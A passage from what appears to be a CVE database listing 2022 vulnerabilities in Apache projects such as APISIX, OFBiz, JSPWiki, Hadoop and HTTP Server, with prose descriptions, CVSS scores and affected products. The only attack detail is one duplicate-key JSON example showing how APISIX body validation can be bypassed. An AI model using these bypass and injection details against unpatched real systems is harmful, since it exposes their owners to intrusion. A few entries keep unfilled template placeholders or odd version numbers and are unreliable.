CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,CWE-416,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apple macos *
apache subversion *
fedoraproject fedora 36
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-24112 HIGH

An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-290,CWE-290,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-24280

Improper Input Validation vulnerability in Proxy component of Apache Pulsar allows an attacker to make TCP/IP connection attempts that originate from the Pulsar Proxy's IP address. When the Apache Pulsar Proxy component is used, it is possible to attempt to open TCP/IP connections to any IP address and port that the Pulsar Proxy can connect to. An attacker could use this as a way for DoS attacks that originate from the Pulsar Proxy's IP address. It hasn’t been detected that the Pulsar Proxy authentication can be bypassed. The attacker will have to have a valid token to a properly secured Pulsar Proxy. This issue affects Apache Pulsar Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.2; 2.9.0 to 2.9.1; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache pulsar *
CVE-2022-24288 MEDIUM

In Apache Airflow, prior to version 2.2.4, some example DAGs did not properly sanitize user-provided params, making them susceptible to OS Command Injection from the web UI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-24289 MEDIUM

Hessian serialization is a network protocol that supports object-based transmission. Apache Cayenne's optional Remote Object Persistence (ROP) feature is a web services-based technology that provides object persistence and query functionality to 'remote' applications. In Apache Cayenne 4.1 and earlier, running on non-current patch versions of Java, an attacker with client access to Cayenne ROP can transmit a malicious payload to any vulnerable third-party dependency on the server. This can result in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache cayenne *
CVE-2022-24294

A regular expression used in Apache MXNet (incubating) is vulnerable to a potential denial-of-service by excessive resource consumption. The bug could be exploited when loading a model in Apache MXNet that has a specially crafted operator name that would cause the regular expression evaluation to use excessive resources to attempt a match. This issue affects Apache MXNet versions prior to 1.9.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache mxnet *
CVE-2022-24697

Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-24706 HIGH

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1188,CWE-1188,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2022-24947 MEDIUM

Apache JSPWiki user preferences form is vulnerable to CSRF attacks, which can lead to account takeover. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-24948 MEDIUM

A carefully crafted user preferences for submission could trigger an XSS vulnerability on Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-24963

Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0.

Products Affected

Vendor Product Version
apache portable_runtime 1.7.0
CVE-2022-24969 MEDIUM

bypass CVE-2021-25640 > In Apache Dubbo prior to 2.6.12 and 2.7.15, the usage of parseURL method will lead to the bypass of the white host check which can cause open redirect or SSRF vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-601,CWE-918,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2022-25147

Integer Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions.

Products Affected

Vendor Product Version
apache portable_runtime_utility *
CVE-2022-25167 HIGH

Apache Flume versions 1.4.0 through 1.9.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache flume *
CVE-2022-25168

Apache Hadoop's FileUtil.unTar(File, File) API does not escape the input file name before being passed to the shell. An attacker can inject arbitrary commands. This is only used in Hadoop 3.3 InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for yarn localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE. As the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305. "Check existence of file before untarring/zipping", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed, regardless of which version of the hadoop libraries are in use. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or upper (including HADOOP-18136).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hadoop *
CVE-2022-25169 MEDIUM

The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle primavera_unifier 21.12
apache tika *
oracle primavera_unifier *
oracle primavera_unifier 18.8
CVE-2022-25312 MEDIUM

An XML external entity (XXE) injection vulnerability was discovered in the Any23 RDFa XSLTStylesheet extractor and is known to affect Any23 versions < 2.7. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Any23 2.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache any23 *
CVE-2022-25370

Apache OFBiz uses the Birt plugin (https://eclipse.github.io/birt-website/) to create data visualizations and reports. In Apache OFBiz release 18.12.05, and earlier versions, by leveraging a vulnerability in Birt (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142), an unauthenticated malicious user could perform a stored XSS attack in order to inject a malicious payload and execute it using the stored XSS.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-25371

Apache OFBiz uses the Birt project plugin (https://eclipse.github.io/birt-website/) to create data visualizations and reports. By leveraging a bug in Birt (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142) it is possible to perform a remote code execution (RCE) attack in Apache OFBiz, release 18.12.05 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-25598 MEDIUM

Apache DolphinScheduler user registration is vulnerable to Regular express Denial of Service (ReDoS) attacks, Apache DolphinScheduler users should upgrade to version 2.0.5 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1333,CWE-1333,

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-25757 MEDIUM

In Apache APISIX before 2.13.0, when decoding JSON with duplicate keys, lua-cjson will choose the last occurred value as the result. By passing a JSON with a duplicate key, the attacker can bypass the body_schema validation in the request-validation plugin. For example, `{"string_payload":"bad","string_payload":"good"}` can be used to hide the "bad" input. Systems satisfy three conditions below are affected by this attack: 1. use body_schema validation in the request-validation plugin 2. upstream application uses a special JSON library that chooses the first occurred value, like jsoniter or gojay 3. upstream application does not validate the input anymore. The fix in APISIX is to re-encode the validated JSON input back into the request body at the side of APISIX. Improper Input Validation vulnerability in __COMPONENT__ of Apache APISIX allows an attacker to __IMPACT__. This issue affects Apache APISIX Apache APISIX version 2.12.1 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-25762 HIGH

If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L 3.9 4.7

CVSS 2.0

Severity: HIGH

Problem Type: CWE-404,CWE-404,

Products Affected

Vendor Product Version
apache tomcat *
oracle agile_plm 9.3.6
CVE-2022-25763

Improper Input Validation vulnerability in HTTP/2 request validation of Apache Traffic Server allows an attacker to create smuggle or cache poison attacks. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
apache traffic_server *
debian debian_linux 11.0
CVE-2022-25813

In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin, can insert a malicious content in a message “Subject” field from the "Contact us" page. Then a party manager needs to list the communications in the party component to activate the SSTI. A RCE is then possible.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-26112

In 0.10.0 or older versions of Apache Pinot, Pinot query endpoint and realtime ingestion layer has a vulnerability in unprotected environments due to a groovy function support. In order to avoid this, we disabled the groovy function support by default from Pinot release 0.11.0. See https://docs.pinot.apache.org/basics/releases/0.11.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pinot *
CVE-2022-26336 MEDIUM

A shortcoming in the HMEF package of poi-scratchpad (Apache POI) allows an attacker to cause an Out of Memory exception. This package is used to read TNEF files (Microsoft Outlook and Microsoft Exchange Server). If an application uses poi-scratchpad to parse TNEF files and the application allows untrusted users to supply them, then a carefully crafted file can cause an Out of Memory exception. This issue affects poi-scratchpad version 5.2.0 and prior versions. Users are recommended to upgrade to poi-scratchpad 5.2.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-770,CWE-770,

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache poi *
CVE-2022-26377 MEDIUM

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-26477 MEDIUM

The Security Team noticed that the termination condition of the for loop in the readExternal method is a controllable variable, which, if tampered with, may lead to CPU exhaustion. As a fix, we added an upper bound and termination condition in the read and write logic. We classify it as a "low-priority but useful improvement". SystemDS is a distributed system and needs to serialize/deserialize data but in many code paths (e.g., on Spark broadcast/shuffle or writing to sequence files) the byte stream is anyway protected by additional CRC fingerprints. In this particular case though, the number of decoders is upper-bounded by twice the number of columns, which means an attacker would need to modify two entries in the byte stream in a consistent manner. By adding these checks robustness was strictly improved with almost zero overhead. These code changes are available in versions higher than 2.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-400,

Products Affected

Vendor Product Version
apache systemds *
CVE-2022-26612 HIGH

In Apache Hadoop, The unTar function uses unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may extract an arbitrary file into the external directory using the symlink name. This however would be caught by the same targetDirPath check on Unix because of the getCanonicalPath call. However on Windows, getCanonicalPath doesn't resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links which allows writing outside expected base directory on Windows. This was addressed in Apache Hadoop 3.2.3

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache hadoop 3.3.2
apache hadoop 3.3.1
apache hadoop *
CVE-2022-26650 MEDIUM

In Apache ShenYui, ShenYu-Bootstrap, RegexPredicateJudge.java uses Pattern.matches(conditionData.getParamValue(), realData) to make judgments, where both parameters are controllable by the user. This can cause an attacker pass in malicious regular expressions and characters causing a resource exhaustion. This issue affects Apache ShenYu (incubating) 2.4.0, 2.4.1 and 2.4.2 and is fixed in 2.4.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1333,CWE-1333,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
apache shenyu 2.4.2
CVE-2022-26779 MEDIUM

Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-338,

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2022-26850 MEDIUM

When creating or updating credentials for single-user access, Apache NiFi wrote a copy of the Login Identity Providers configuration to the operating system temporary directory. On most platforms, the operating system temporary directory has global read permissions. NiFi immediately moved the temporary file to the final configuration directory, which significantly limited the window of opportunity for access. NiFi 1.16.0 includes updates to replace the Login Identity Providers configuration without writing a file to the operating system temporary directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
apache nifi *
CVE-2022-26884

Users can read any files by log server, Apache DolphinScheduler users should upgrade to version 2.0.6 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-26885

When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-27166

A carefully crafted request on XHRHtml2Markup.jsp could trigger an XSS vulnerability on Apache JSPWiki up to and including 2.11.2, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-27479 HIGH

Apache Superset before 1.4.2 is vulnerable to SQL injection in chart data requests. Users should update to 1.4.2 or higher which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,CWE-89,

Products Affected

Vendor Product Version
apache superset *
CVE-2022-27949

A vulnerability in UI of Apache Airflow allows an attacker to view unmasked secrets in rendered template values for tasks which were not executed (for example when they were depending on past and previous instances of the task failed). This issue affects Apache Airflow prior to 2.3.1.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-28129

Improper Input Validation vulnerability in HTTP/1.1 header parsing of Apache Traffic Server allows an attacker to send invalid headers. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2022-28220

Apache James prior to release 3.6.3 and 3.7.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. Fix of CVE-2021-38542, which solved similar problem fron Apache James 3.6.1, is subject to a parser differential and do not take into account concurrent requests.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache james 3.7.0
apache james *
CVE-2022-28330 MEDIUM

Apache HTTP Server 2.4.53 and earlier on Windows may read beyond bounds when configured to process requests with the mod_isapi module.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,CWE-125,

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-28331

On Windows, Apache Portable Runtime 1.7.0 and earlier may write beyond the end of a stack based buffer in apr_socket_sendv(). This is a result of integer overflow.

Products Affected

Vendor Product Version
apache portable_runtime *
CVE-2022-28614 MEDIUM

The ap_rwrite() function in Apache HTTP Server 2.4.53 and earlier may read unintended memory if an attacker can cause the server to reflect very large input using ap_rwrite() or ap_rputs(), such as with mod_luas r:puts() function. Modules compiled and distributed separately from Apache HTTP Server that use the 'ap_rputs' function and may pass it a very large (INT_MAX or larger) string must be compiled against current headers to resolve the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,CWE-200,CWE-190,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-28615 MEDIUM

Apache HTTP Server 2.4.53 and earlier may crash or disclose information due to a read beyond bounds in ap_strcmp_match() when provided with an extremely large input buffer. While no code distributed with the server can be coerced into such a call, third-party modules or lua scripts that use ap_strcmp_match() may hypothetically be affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,CWE-190,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-28730

A carefully crafted request on AJAXPreview.jsp could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. This vulnerability leverages CVE-2021-40369, where the Denounce plugin dangerously renders user-supplied URLs. Upon re-testing CVE-2021-40369, it appears that the patch was incomplete as it was still possible to insert malicious input via the Denounce plugin. Apache JSPWiki users should upgrade to 2.11.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28731

A carefully crafted request on UserPreferences.jsp could trigger an CSRF vulnerability on Apache JSPWiki before 2.11.3, which could allow the attacker to modify the email associated with the attacked account, and then a reset password request from the login page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28732

A carefully crafted request on WeblogPlugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28889 MEDIUM

In Apache Druid 0.22.1 and earlier, the server did not set appropriate headers to prevent clickjacking. Druid 0.23.0 and later prevent clickjacking using the Content-Security-Policy header.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1021,CWE-1021,

Products Affected

Vendor Product Version
apache druid *
CVE-2022-28890 HIGH

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache jena 4.4.0
CVE-2022-29063

The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-29158

Apache OFBiz up to version 18.12.05 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles URLs provided by external, unauthenticated users. Upgrade to 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12599

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-29265 MEDIUM

Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. The Standard Content Viewer service attempts to resolve XML External Entity references when viewing formatted XML files. The following Processors attempt to resolve XML External Entity references when configured with default property values: - EvaluateXPath - EvaluateXQuery - ValidateXml Apache NiFi flow configurations that include these Processors are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations in the default configuration for these Processors, and disallows XML External Entity resolution in standard services.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2022-29266 MEDIUM

In APache APISIX before 3.13.1, the jwt-auth plugin has a security issue that leaks the user's secret key because the error message returned from the dependency lua-resty-jwt contains sensitive information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,CWE-209,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-29404 MEDIUM

In Apache HTTP Server 2.4.53 and earlier, a malicious request to a lua script that calls r:parsebody(0) may cause a denial of service due to no default limit on possible input size.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,CWE-770,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-29405 MEDIUM

In Apache Archiva, any registered user can reset password for any users. This is fixed in Archiva 2.2.8

CVSS 3.x

Source Score Severity Vector Exploitability Impact
